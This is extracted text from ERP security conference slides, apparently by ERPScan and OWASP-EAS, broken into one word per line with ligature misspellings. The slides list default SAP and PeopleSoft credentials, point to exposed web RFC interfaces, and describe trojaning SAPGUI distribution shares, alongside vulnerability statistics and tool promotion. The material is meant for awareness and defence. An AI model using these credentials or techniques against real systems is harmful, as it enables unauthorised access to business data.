o Can
be
used
to
steal
creden8als
o !
ERPs
run
database
from
the
own
service
creden8al,
not
from
the
‘Network
Service’
46
48. Examples
of
Applica6on
Vulnerabili6es
• Default
passwords
– Any
ERP
installs
with
predefined
passwords
o For
Applica8on
o For
Database
o Some8mes
for
OS
– Most
of
them
are
well
known
– Will
be
published
at
OWASP
48
49. SAP
default
passwords
• FOR
Applica6on
• FOR
Database
– SAPR3/SAP
– +
Oracle
defaults
in
the
older
versions
49
50. PeopleSo
default
passwords
• FOR
Applica8on
(many)
– FEDTBHADMN1/
FEDTBHADMN1
– FEDTBHADMN1/
FEDTBHMGR01
– FEDTBHMGR02/
FEDTBHMGR02
– HAM/HAM
– etc…
• For
Database
– Peop1e/Peop1e
– PS/PS
– Sysadm/sysadm
– +
Oracle
defaults
in
the
old
versions
50
52. Examples
of
Applica6on
Vulnerabili6es
Remote
management
interfaces
• Example
of
SAP
(other
have
the
same
problems)
• There
is
web
RFC
access
• Google
it
/sap/bc/webrfc
• All
RFC
features
are
possible
• Plus
something
more
including
dos/smbrelay
• Details
later
on
h_p://erpscan.com
• Remote
pwnage
is
possible
52
55. Examples
of
Frontend
Vulnerabili6es
Insecure
distribu6on
service
• Example
of
SAP
(others
have
the
same
problems)
• SAPGUI
onen
distributes
from
corporate
file
server
• Onen
this
share
available
for
any
user
• Configura8on
files
and
distribu8ves
can
be
overwri_en
– Insert
Trojan
– Redirect
to
fake
servers
The
same
problems
when
using
terminal
services
55
57. Enterprise
Applica6on
Vulnerability
Sta6s6cs
2009
“This
document
we
will
show
a
result
of
staDsDcal
research
in
the
Business
ApplicaDon
security
area
made
by
ERPScan
and
OWASP-‐EAS
project.
The
purpose
of
this
document
is
to
raise
awareness
about
Enterprise
Business
ApplicaDon
security
by
showing
the
current
number
of
vulnerabiliDes
found
in
these
applicaDons
and
how
criDcal
it
is
can
be”
• Analyzed
systems
– ERP
Systems
– Business
Frontend
sonware.
– Database
systems
– Applica8on
servers
• Analyzed
resources
– h_p://securityfocus.com
,
h_p://exploit-‐db.com
– h_p://cwe.mitre.org
,
h_p://cvedetails.com
– h_p://oracle.com
,
h_p://sdn.sap.com
,
h_p://ibm.com
57
61. Growing
interest
• Number
of
found
vulnerabili8es
grows
– gree8ngs
to
all
companies
in
applica8on
security
area
• Number
of
talks
about
ERP
security
at
conferences
grows
– 2006(1),2007(1),2008(2),2009(3),2010(10!)
• And
also
companies
pay
more
a_en8on
to
this
area
– SAP
security
response
team
are
growing
every
year
This
area
is
becoming
popular.
We
really
need
automa6c
tools
for
ERP
security
assessment
for
pentesters
and
for
administrators
61
62. Need
for
Automa6on
What
we
have
done
• Sapsploit
and
Sapscan
–tools
for
pentes8ng
and
trojaning
SAP
users
• ERPSCAN
Online
–
free
service
for
assessing
SAP
Frontend
security
• ERPSCAN
Security
scanner
for
SAP
–enterprise
applica8on
for
solving
full
area
of
problems
in
SAP
solu8ons
62
63. ERPSCAN
–Security
Scanner
for
SAP
• Corporate
scanner
for
assessing
security
of
SAP
systems
• Checking
for
misconfigura6ons,
public
vulnerabili6es,
0-‐days,
compliance
with
standards
and
metrics
• Checking
both
ABAP
and
JAVA
instances,
more
than
400
checks
• Whitebox
scanning
to
prevent
possible
damage
• Addi8onal
engine
for
checking
exis6ng
vulnerabili6es
without
exploi6ng
them
• Extended
knowledgebase
for
all
checks
with
detailed
descrip6ons
and
countermeasures
collected
by
ERPcan
experts
• ERPSCAN.COM
63
64. Conclusion
about
ERP
Security
• ERP
security
is
not
a
myth
• Becomes
more
popular
for
BlackHats
and
WhiteHats
• There
is
a
need
to
create
guidelines
and
increase
awareness
in
this
area
• OWASP-‐EAS
call
for
volunteers
with
background
in
this
area
• ERP
security
is
very
complex
and
if
you
are
ready
to
do
it
24/7
then
do
it
• If
you
cannot
do,
leave
it
to
professionals
64